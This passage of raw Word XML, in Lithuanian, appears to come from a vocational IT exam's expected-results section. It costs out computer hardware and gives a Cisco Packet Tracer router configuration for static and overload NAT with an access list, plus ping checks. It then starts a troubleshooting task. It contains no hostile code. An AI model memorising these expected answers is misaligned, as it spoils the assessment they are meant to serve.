              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>24478</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="2C51FA8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="1F88C1D2" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68CDCA3C" w14:textId="61F3DA40" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Išvados.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parinkt</w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuterinė ir tinklų įranga</w:t>
      </w:r>
      <w:r w:rsidR="003F0C14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atitinkanti gamintoj</w:t>
      </w:r>
      <w:r w:rsidR="35ADE660" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>reikalavim</w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Galutinė šio</w:t>
      </w:r>
      <w:r w:rsidR="1E98346C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrangos komponentų kaina </w:t>
      </w:r>
      <w:r w:rsidR="14578200" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">24478.4 €. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ši</w:t>
      </w:r>
      <w:r w:rsidR="56AB3E08" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuteri</w:t>
      </w:r>
      <w:r w:rsidR="0CFFB81E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> komponentai buvo pasirinkti siekiant surinkti vidutinio</w:t>
      </w:r>
      <w:r w:rsidR="22DC6C78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> na</w:t>
      </w:r>
      <w:r w:rsidR="010E8C12" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidR="22DC6C78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>umo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="00736E9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ius</w:t>
      </w:r>
      <w:r w:rsidR="43873DE6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, t.y.</w:t>
      </w:r>
      <w:r w:rsidR="00736E9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> atitinkančius 2D ir 3D</w:t>
      </w:r>
      <w:r w:rsidR="5D3483BB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00736E9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>prog</w:t>
      </w:r>
      <w:r w:rsidR="262A83FB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00736E9E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>amų</w:t>
      </w:r>
      <w:r w:rsidR="13A5D201" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> gamintojų</w:t>
      </w:r>
      <w:r w:rsidR="56C11C53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> reikalavimams.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kompiuter</w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iuose</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> bus naudojama Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="0024358D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>operacinė sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DF879" w14:textId="77777777" w:rsidR="00373F6D" w:rsidRPr="005A5C28" w:rsidRDefault="52890093" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00373F6D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00373F6D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATLIKTI TINKLO ĮRANGOS ANALIZĘ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DBA96B" w14:textId="6D013007" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="00F23ED7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="07DA55A6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="07DA55A6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti Cisco Packet Tracer simuliacijos trūkstančios tinklinės įrangos konfigūraciją.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37A02C" w14:textId="6D3503B2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nustatymai statinio NAT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701CA97D" w14:textId="177C2917" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nat inside source static tcp 192.168.3.2 80 213.234.10.2. 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB8D01" w14:textId="0E30837F" w:rsidR="10C2F772" w:rsidRPr="005A5C28" w:rsidRDefault="10C2F772" w:rsidP="0089230F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B0E5BA" w14:textId="7D0E5515" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Maršrutizatoriaus (Router 0) nustatymai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C3DBF" w14:textId="53494FC8" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D1CAB" w14:textId="381237D2" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line. End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8E495" w14:textId="3C276212" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip nat inside source list FOR-NAT interface gig 0/0 overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BF884" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip nat inside source static tcp 192.168.3.2 80 213.234.10.2 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90C8EB" w14:textId="76FF3B1E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip access-list standard FOR-NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E02A63F" w14:textId="57AADDE7" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-std-nacl)#permit 192.168.2.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBBBF50" w14:textId="2F1B4E10" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-std-nacl)#permit 192.168.3.0 0.0.0.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306EFC36" w14:textId="7C62E483" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-std-nacl)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60012A4F" w14:textId="5E4C585A" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCAC332" w14:textId="4A6C0ED6" w:rsidR="009336D8" w:rsidRPr="005A5C28" w:rsidRDefault="6F163ACE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Reikia </w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įvesti komandą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>„P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> iš PC0 į 213.234.20.2, </w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>po to</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> iš </w:t>
      </w:r>
      <w:r w:rsidR="00D040C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">erver 0 į 213.234.20.2. </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tidarius Server1 Web Browser įvesti </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>savo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web serverio ip adresą (213.234.10.2). Jeigu atsidarė puslapis, vadinasi</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>užduotis atlikta tinkamai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60018E" w14:textId="309AA33B" w:rsidR="70B73EFF" w:rsidRPr="005A5C28" w:rsidRDefault="70B73EFF" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B59C5D" w14:textId="77777777" w:rsidR="00144325" w:rsidRPr="005A5C28" w:rsidRDefault="00144325" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATIKRINTI TINKLO ĮRANGOS FUNKCIONAVI</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>MĄ, NUSTATYTI SUTRIKIMUS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C2DE6C" w14:textId="78415394" w:rsidR="66F7E20F" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="7F45095B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Mokinys turi r</w:t>
      </w:r>
      <w:r w:rsidR="7F45095B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ast</w:t>
      </w:r>
      <w:r w:rsidR="00E643C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir įvardinti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F45095B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>problem</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="7F45095B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
